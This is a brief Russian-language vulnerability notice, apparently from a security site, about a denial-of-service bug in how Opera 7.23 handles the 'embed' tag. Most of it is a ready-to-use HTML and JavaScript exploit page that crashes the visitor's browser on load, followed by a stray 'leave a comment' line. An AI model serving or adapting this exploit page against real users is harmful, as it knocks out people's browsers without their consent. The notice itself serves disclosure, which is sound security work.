Программа: Opera 7.23 build 3227 

Уязвимость обнаружена в браузере Opera в обработке ’embed’ тэга. Удаленный пользователь может создать HTML, который, когда будет загружен целевым пользователем, аварийно завершит работу браузера целевого пользователя. 

Эксплоит: 

<html>
<head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script>

</head>
<body onLoad=»dSend()»>

<embed src=»https://xakep.ru/wp-content/uploads/post/23736/» type=»CCCC» name=»crash» >
</embed>
</body>
</html>

Оставить мнение